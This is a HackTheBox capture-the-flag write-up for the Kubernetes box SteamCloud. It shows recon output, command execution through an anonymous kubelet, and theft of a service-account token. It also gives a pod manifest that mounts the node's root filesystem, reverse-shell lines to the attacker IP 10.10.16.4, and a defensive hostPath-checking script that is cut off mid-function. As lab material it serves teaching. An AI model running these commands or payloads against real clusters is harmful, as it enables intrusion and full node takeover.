HackTheBox-SteamCloud


title: HackTheBox-SteamCloud - Kubernetes unauthenticated access
author: Mosaic Theory
categories: vulnerability labs
tags: box diary


Wasting time is robbing oneself.


HackTheBox-SteamCloud:

Recon:

masscan:

>> sudo masscan -p1-65535,U:1-65535 10.10.11.133 --rate 2000 -e tun0
[sudo] password for mosaictheory:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-14 10:02:32 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.133                                    
Discovered open port 2379/tcp on 10.10.11.133                                  
Discovered open port 10256/tcp on 10.10.11.133                                 
Discovered open port 8443/tcp on 10.10.11.133                                  
Discovered open port 10249/tcp on 10.10.11.133                                 
Discovered open port 10250/tcp on 10.10.11.133                                 
Discovered open port 2380/tcp on 10.10.11.133 

Nmap:

>> sudo nmap -sC -sV -Pn 10.10.11.133 -p22,2379,10256,8443,10249,1250,2380
Nmap scan report for 10.10.11.133
Host is up (0.33s latency).

PORT      STATE  SERVICE          VERSION
22/tcp    open   ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
1250/tcp  closed swldy-sias
2379/tcp  open   ssl/etcd-client?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2022-05-14T10:02:00
|_Not valid after:  2023-05-14T10:02:00
| tls-alpn: 
|_  h2
|_ssl-date: TLS randomness does not represent time
2380/tcp  open   ssl/etcd-server?
| tls-alpn: 
|_  h2
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2022-05-14T10:02:00
|_Not valid after:  2023-05-14T10:02:01
8443/tcp  open   ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 259e34c0-7408-465b-bb52-13e9b6c3a1bd
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
|     Date: Sat, 14 May 2022 10:06:08 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: f6ce1760-50c1-44b5-8c1c-f24c8126a46c
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
|     Date: Sat, 14 May 2022 10:06:05 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 786acb3a-4dbc-4702-909f-b97968ee50a7
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 02934147-5409-4441-b7e6-6388d55f4dd4
|     X-Kubernetes-Pf-Prioritylevel-Uid: 87805fbd-eebb-4063-b814-3d599d9f6cca
|     Date: Sat, 14 May 2022 10:06:07 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_http-title: Site doesn't have a title (application/json).
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2022-05-13T10:01:57
|_Not valid after:  2025-05-13T10:01:57
10249/tcp open   http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10256/tcp open   http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=5/14%Time=627F7F0D%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20f6ce1
SF:760-50c1-44b5-8c1c-f24c8126a46c\r\nCache-Control:\x20no-cache,\x20priva
SF:te\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20n
SF:osniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-63
SF:88d55f4dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-
SF:b814-3d599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:05\x20
SF:GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion\
SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden
SF::\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTTP
SF:Options,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20786acb3a-4db
SF:c-4702-909f-b97968ee50a7\r\nCache-Control:\x20no-cache,\x20private\r\nC
SF:ontent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff\
SF:r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-6388d55f4
SF:dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-b814-3d
SF:599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:07\x20GMT\r\n
SF:Content-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\
SF:",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20Us
SF:er\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\\
SF:"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOhF
SF:ourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20259e34c0-
SF:7408-465b-bb52-13e9b6c3a1bd\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2002934147-5409-4441-b7e6-6388d5
SF:5f4dd4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2087805fbd-eebb-4063-b814
SF:-3d599d9f6cca\r\nDate:\x20Sat,\x2014\x20May\x202022\x2010:06:08\x20GMT\
SF:r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\"
SF::{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.10 seconds

Note that the nmap command above has a typo, 1250 instead of 10250, so the kubelet port that masscan found open was never fingerprinted by nmap (1250 simply shows as closed). This was my first contact with Kubernetes, so I went looking for the official docs:

https://kubernetes.io/docs/concepts/overview/what-is-kubernetes/

Ports 2379 and 2380 are etcd's client and peer ports. They speak TLS, but etcd here requires a client certificate, so every attempt from the browser is rejected, with the same untrusted-certificate warning I saw at first (the certificate is issued by the cluster's own CA). Same for 2380:

8443 answers with a JSON Status object straight away: the API server is reachable, but system:anonymous is forbidden to do anything:

10249 and 10256 look the same: both are kube-proxy's plain-HTTP endpoints (metrics and healthz respectively), nothing to authenticate against:

First look at Kubernetes:

Kubectl:

This hit a blind spot in my knowledge; luckily I found this in the official docs:

https://kubernetes.io/docs/tasks/tools/

Perhaps I can use this tool to manage the target, even though experience says this kind of access needs credentials and I have none. It downloads with:

>> curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

After downloading, fetch the checksum file and verify the binary against it:

>> curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"
echo "$(cat kubectl.sha256)  kubectl" | sha256sum --check
kubectl: OK

Install it with:

sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl

Check the version; the installation succeeded:

>> kubectl version --client --output=yaml   
clientVersion:
  buildDate: "2022-05-03T13:46:05Z"
  compiler: gc
  gitCommit: 4ce5a8954017644c5420bae81d72b09b735c21f0
  gitTreeState: clean
  gitVersion: v1.24.0
  goVersion: go1.18.1
  major: "1"
  minor: "24"
  platform: linux/amd64
kustomizeVersion: v4.5.4

But when I tried to connect to the target, sure enough it asked for a username and password:

>> sudo kubectl --server https://10.10.11.133:10249  get pod
Please enter Username: admin
Please enter Password: 
Unable to connect to the server: http: server gave HTTP response to HTTPS client

The prompt only appears because kubectl has no credentials configured and falls back to asking for basic-auth ones. The real problem is the port: 10249 is kube-proxy's plain-HTTP metrics endpoint, not the API server, which is why the HTTPS client complains that the server answered in plain HTTP. The API server is the one on 8443, and as the nmap output shows it rejects system:anonymous.

kubeletctl:

Surely I am not expected to guess credentials. Google then led me to this:

https://github.com/cyberark/kubeletctl

It has many functions:

Available Commands:
  attach        Attach to a container
  configz       Return kubelet's configuration.
  containerLogs Return container log
  cri           Run commands inside a container through the Container Runtime Interface (CRI)
  debug         Return debug information (pprof or flags)
  exec          Run commands inside a container
  healthz       Check the state of the node
  help          Help about any command
  log           Return the log from the node.
  metrics       Return resource usage metrics (such as container CPU, memory usage, etc.)
  pods          Get list of pods on the node
  portForward   Attach to a container
  run           Run commands inside a container
  runningpods   Returns all pods running on kubelet from looking at the container runtime cache.
  scan          Scans for nodes with opened kubelet API
  spec          Cached MachineInfo returned by cadvisor
  stats         Return statistical information for the resources in the node.
  version       Print the version of the kubeletctl

I can try listing the target's pods. kubeletctl talks to the kubelet's own API on 10250 (the port masscan found and nmap missed), and it worked without any credentials: this kubelet accepts anonymous requests and authorises them, which is the misconfiguration the whole box turns on:

>> kubeletctl pods -s 10.10.11.133 
┌───────────────────────────────────────────────────────────────────────────────────┐
│                                 Pods from Kubelet                                 │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│   │ POD                                │ NAMESPACE   │ CONTAINERS              │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ coredns-78fcd69978-qr9j8           │ kube-system │ coredns                 │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ nginx                              │ default     │ nginx                   │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ etcd-steamcloud                    │ kube-system │ etcd                    │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ kube-apiserver-steamcloud          │ kube-system │ kube-apiserver          │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud          │ kube-system │ kube-scheduler          │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ storage-provisioner                │ kube-system │ storage-provisioner     │
│   │                                    │             │                         │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-proxy-4cnt8                   │ kube-system │ kube-proxy              │
│   │                                    │             │                         │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘

Only nginx is outside the kube-system namespace; I wonder whether this is the path the box author left for me.

User.txt:

In the help output I also saw exec; perhaps I can try running a command:

>> kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx 
uid=0(root) gid=0(root) groups=0(root)

It works, and as root too. Perhaps I can read root.txt directly:

>> kubeletctl -s 10.10.11.133 exec "cat /root/root.txt" -p nginx -c nginx
cat: /root/root.txt: No such file or directory
command terminated with exit code 1

It says there is no such file; oh, what sits under /root is a user.txt:

>> kubeletctl -s 10.10.11.133 exec "ls /root" -p nginx -c nginx
user.txt
>> kubeletctl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx
cd8bbd...............................

root.txt:

I try a reverse bash shell:

>> kubeletctl -s 10.10.11.133 exec "which bash" -p nginx -c nginx
/bin/bash
>> kubeletctl -s 10.10.11.133 exec "bash -c 'bash -i >& /dev/tcp/10.10.16.4/9001 0>&1'" -p nginx -c nginx
-i: -c: line 0: unexpected EOF while looking for matching `''
-i: -c: line 1: syntax error: unexpected end of file
command terminated with exit code 1
>> kubeletctl -s 10.10.11.133 exec "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1" -p nginx -c nginx 
bash: >: No such file or directory
command terminated with exit code 127

Both errors say the same thing: kubeletctl splits the command string on whitespace and hands the pieces to the container runtime as argv, with no shell in between. The single quotes therefore reach bash literally (hence "unexpected EOF while looking for matching `''"), and in the second attempt the redirection operators arrive as ordinary arguments, so bash -i tries to open them as a script file instead of redirecting.

I try encoding the payload:

>> kubeletctl -s 10.10.11.133 exec 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzkwMDEgMD4mMQo="| base64 -d | bash"' -p nginx -c nginx
"YmFzaCAtaSA JiAvZGV2L3RjcC8xMC4xMC4xNi40LzkwMDEgMD4mMQo="base64 -d | bash"

No good: it came back just as I sent it. Without a shell on the far side the pipes are not interpreted, so everything after echo is simply echo's arguments. Notice too that the + in the base64 came back as a space, which is what URL query and form decoding do to an unencoded +, so even a correctly quoted pipeline would have been corrupted. It seems this path only runs simple commands. More googling turned up this article:

https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet

It explains how to test Kubernetes and lists some sensitive paths, for example:

/var/run/secrets/kubernetes.io/serviceaccount/token

I can steal it:

>> kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6InNaQkd1a0xEWVNDeHBhSTNXTVE5Yl82SjExZnRtX3JxN3FWTmtGQXMzS28ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjg0MDY3MzM1LCJpYXQiOjE2NTI1MzEzMzUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImJlODRjNTU0LTg1MDItNGFhZi05OGNhLWQyZTgzNTNjOTNjNSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjYxYjFkMDBkLTMwNmUtNDE4MS04NzdiLWFkNDQxMTk3ZTk1MSJ9LCJ3YXJuYWZ0ZXIiOjE2NTI1MzQ5NDJ9LCJuYmYiOjE2NTI1MzEzMzUsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.F-aIO1xYv8b_6WusHstg43jLPDt_BtYxOvXSH4MZtf71OzjuuKXpN4Dsi8OMQX-IQ_yMyhjTYWhjDZpZ-Lb1bmEJbDbUDM1DqfVvxkmAHp_sGQqxbyqnkM04EvIhcjrKW8I_pQKSkK22NGZYcManSUmJuZLFn12XSKzOp3javgR62St4KCYemXLrd-N-s4wUpUkUCgbabfLkx7TJtSOjM2FRCqkfZo9w5sQ_mXhbKs998EXV-VdWR-iWt1A3hggteiIn4j3LyUxmET9UD1jXU8N6kzYZkrWTdoUCyQSK5jolwCAYdsoCN8QGHYPFxDgTvJRzXz7kNDXXL6D_BCf5Ow 

I tried to decode it, but:

>> echo "eyJhbGciOiJSUzI1NiIsImtpZCI6InNaQkd1a0xEWVNDeHBhSTNXTVE5Yl82SjExZnRtX3JxN3FWTmtGQXMzS28ifQ.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.F-aIO1xYv8b_6WusHstg43jLPDt_BtYxOvXSH4MZtf71OzjuuKXpN4Dsi8OMQX-IQ_yMyhjTYWhjDZpZ-Lb1bmEJbDbUDM1DqfVvxkmAHp_sGQqxbyqnkM04EvIhcjrKW8I_pQKSkK22NGZYcManSUmJuZLFn12XSKzOp3javgR62St4KCYemXLrd-N-s4wUpUkUCgbabfLkx7TJtSOjM2FRCqkfZo9w5sQ_mXhbKs998EXV-VdWR-iWt1A3hggteiIn4j3LyUxmET9UD1jXU8N6kzYZkrWTdoUCyQSK5jolwCAYdsoCN8QGHYPFxDgTvJRzXz7kNDXXL6D_BCf5Ow" | base64 -d
{"alg":"RS256","kid":"sZBGukLDYSCxpaI3WMQ9b_6J11ftm_rq7qVNkFAs3Ko"}base64: invalid input

That is expected: the token is a JWT, three base64url segments joined by dots (header.payload.signature), and base64 -d stops at the first dot, so only the header was decoded. The middle segment is the interesting one; it states which service account, namespace and pod the token belongs to and when it expires.
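How to read the token properly, as an added example (my own code, not from the post or from kubeletctl). It decodes each segment as padding-less base64url, which is exactly what base64 -d could not do, and pulls out the service account, namespace, bound pod and expiry before the token is handed to kubectl. The header is the one shown above; the claims are the ones carried by the token's middle segment; the signature is a placeholder, so SAMPLE_TOKEN is a constructed stand-in for the captured token, and the decoder never verifies signatures:

```python
"""Read a Kubernetes service-account token (a JWT) without base64 -d tripping on the dots."""
import base64
import binascii
import json
import time
from typing import Any, Dict, Optional


def _b64url_decode(segment: str) -> bytes:
    # JWT segments use the URL-safe alphabet and drop the '=' padding;
    # restore the padding before decoding.
    segment = segment.strip()
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_unverified(token: str) -> Dict[str, Any]:
    """Split header.payload.signature and decode the two JSON parts.

    The signature is NOT checked: this only reads what a captured token claims.
    The API server is the party that verifies it against the SA signing key.
    """
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError(f"expected 3 dot-separated segments, got {len(parts)}")
    return {
        "header": json.loads(_b64url_decode(parts[0])),
        "claims": json.loads(_b64url_decode(parts[1])),
        "signature": _b64url_decode(parts[2]),
    }


def plain_base64_fails(token: str) -> bool:
    """True if strict standard base64 rejects the whole token (the base64 -d failure)."""
    try:
        base64.b64decode(token, validate=True)
        return False
    except binascii.Error:
        return True


def summarize_sa_token(token: str, now: Optional[float] = None) -> Dict[str, Any]:
    """Extract the fields that matter before using the token with kubectl."""
    decoded = decode_jwt_unverified(token)
    claims = decoded["claims"]
    k8s = claims.get("kubernetes.io", {})
    now = time.time() if now is None else now
    exp = claims.get("exp")
    return {
        "alg": decoded["header"].get("alg"),
        "kid": decoded["header"].get("kid"),
        "subject": claims.get("sub"),
        "issuer": claims.get("iss"),
        "audience": claims.get("aud"),
        "namespace": k8s.get("namespace"),
        "service_account": k8s.get("serviceaccount", {}).get("name"),
        "bound_pod": k8s.get("pod", {}).get("name"),
        "expired": exp is not None and now >= exp,
        "seconds_left": None if exp is None else exp - now,
    }


# Header exactly as base64 -d printed it above, and the claims carried by the
# token's middle segment. The signature is a placeholder (256 zero bytes), so
# SAMPLE_TOKEN is a constructed stand-in, not the captured token.
PAGE_HEADER = {"alg": "RS256", "kid": "sZBGukLDYSCxpaI3WMQ9b_6J11ftm_rq7qVNkFAs3Ko"}
PAGE_CLAIMS = {
    "aud": ["https://kubernetes.default.svc.cluster.local"],
    "exp": 1684067335,
    "iat": 1652531335,
    "iss": "https://kubernetes.default.svc.cluster.local",
    "kubernetes.io": {
        "namespace": "default",
        "pod": {"name": "nginx", "uid": "be84c554-8502-4aaf-98ca-d2e8353c93c5"},
        "serviceaccount": {"name": "default", "uid": "61b1d00d-306e-4181-877b-ad441197e951"},
        "warnafter": 1652534942,
    },
    "nbf": 1652531335,
    "sub": "system:serviceaccount:default:default",
}


def build_unsigned_sample(header: Dict[str, Any], claims: Dict[str, Any]) -> str:
    """Assemble a compact JWS with a dummy signature, for offline testing only."""
    def compact(obj: Dict[str, Any]) -> bytes:
        return json.dumps(obj, separators=(",", ":")).encode()
    return ".".join([
        _b64url_encode(compact(header)),
        _b64url_encode(compact(claims)),
        _b64url_encode(b"\x00" * 256),
    ])


SAMPLE_TOKEN = build_unsigned_sample(PAGE_HEADER, PAGE_CLAIMS)

if __name__ == "__main__":
    print(json.dumps(summarize_sa_token(SAMPLE_TOKEN), indent=2))
```

To run it against the real token, pass the contents of the token file to summarize_sa_token. The expiry and subject are worth a look before going further: projected service-account tokens are minted per pod with a bounded lifetime (here exp minus iat is exactly one year), and the subject system:serviceaccount:default:default is the identity whose RBAC auth can-i enumerates later.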

There are other sensitive paths as well (on this Debian-based image /var/run is a symlink to /run, so these are the same files):

/run/secrets/kubernetes.io/serviceaccount
/var/run/secrets/kubernetes.io/serviceaccount
>> kubeletctl -s 10.10.11.133 exec "ls /run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx
ca.crt namespace  token
>> kubeletctl -s 10.10.11.133 exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx
ca.crt namespace  token

To avoid copy-paste mistakes, save the CA certificate to a file:

>> kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee ca.crt                
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----

The token can likewise be stored in a variable, as one would in PowerShell:

export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)

Then, with the CA certificate and the token, authenticate to the Kubernetes API:

>> kubectl --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token get pod
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          164m

It works; this time there was no username/password prompt. But what can I actually do? kubectl has an auth can-i command that lists the permissions of the account whose credentials are given:

>> kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
pods                                            []                                    []               [get create list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

The line that matters is pods: [get create list]. A default service account normally gets nothing beyond the discovery URLs (the /api, /apis, /healthz entries every authenticated user has), but this one can create pods in its namespace. So I can try the payload from the article above: a pod that mounts the node's root filesystem through a hostPath volume and starts a reverse shell. Since this is a single-node minikube cluster, the pod is bound to land on the node that holds root.txt:

apiVersion: v1
kind: Pod
metadata:
  name: mosa-pod
spec:
  containers:
  - name: mosa-pod
    image: nginx:1.14.2
    command: ["/bin/bash"]
    args: ["-c", "bash -i >& /dev/tcp/10.10.16.4/9001 0>&1"]
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory

Creation succeeded:

>> kubectl --insecure-skip-tls-verify=true \
          --server="https://10.10.11.133:8443" \
          --token="$token" \
          create -f shell.yaml
pod/mosa-pod created

And the reverse shell came in:

>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.133] 55666
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@mosa-pod:/

I look for root.txt. The node's filesystem is mounted under /host, so find walks it too (the filesystem-loop warning is the overlay2 layer of the very container I am in, reached again through /host):

root@mosa-pod:/# find / -name root.txt
find: File system loop detected; '/host/var/lib/docker/overlay2/74c1cf237c3f1666cfd71a7f54a2263ea73bf931e5fdc8b4db43d76007062980/merged' is part of the same file system loop as '/'.
/host/root/root.txt
find: '/host/proc/1/map_files': Permission denied
find: '/host/proc/2/map_files': Permission denied
find: '/host/proc/3/map_files': Permission denied
root@mosa-pod:/# cat /host/root/root.txt
113....................................
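The pod above reaches root on the node through nothing more exotic than a hostPath volume for /. Below is the check a defender would run over a pod list from the API server (kubectl get pods -A -o json) or from the kubelet's /pods endpoint, written as an added example of my own rather than code from the post: every container mount backed by a hostPath volume is reported, and writable mounts of / or other node-critical paths are rated critical. The pod list is constructed inline from the manifest above, the box's nginx pod and a hypothetical read-only log-reader pod; the list of sensitive paths is my own assumption, and the check generalises beyond / to container-runtime sockets and kubelet state. The Pod Security Standards baseline profile forbids hostPath volumes outright, which is the policy that would have blocked this pod:

```python
"""Flag pods that mount the node's filesystem through hostPath volumes."""
from typing import Any, Dict, List

# Assumed list: host paths whose writable exposure to a pod equals root on the node.
SENSITIVE_HOST_PATHS = (
    "/", "/etc", "/root", "/home", "/var/lib/kubelet", "/var/lib/docker",
    "/var/run/docker.sock", "/run/containerd",
)


def _is_sensitive(path: str) -> bool:
    """True for the node root, a listed path, or anything beneath a listed path."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    for p in SENSITIVE_HOST_PATHS:
        if p == "/":
            continue
        if norm == p or norm.startswith(p + "/"):
            return True
    return False


def host_path_findings(pod: Dict[str, Any]) -> List[Dict[str, Any]]:
    """One finding per container mount whose volume is a hostPath."""
    spec = pod.get("spec", {})
    meta = pod.get("metadata", {})
    host_vols = {v["name"]: v["hostPath"] for v in spec.get("volumes", []) if "hostPath" in v}
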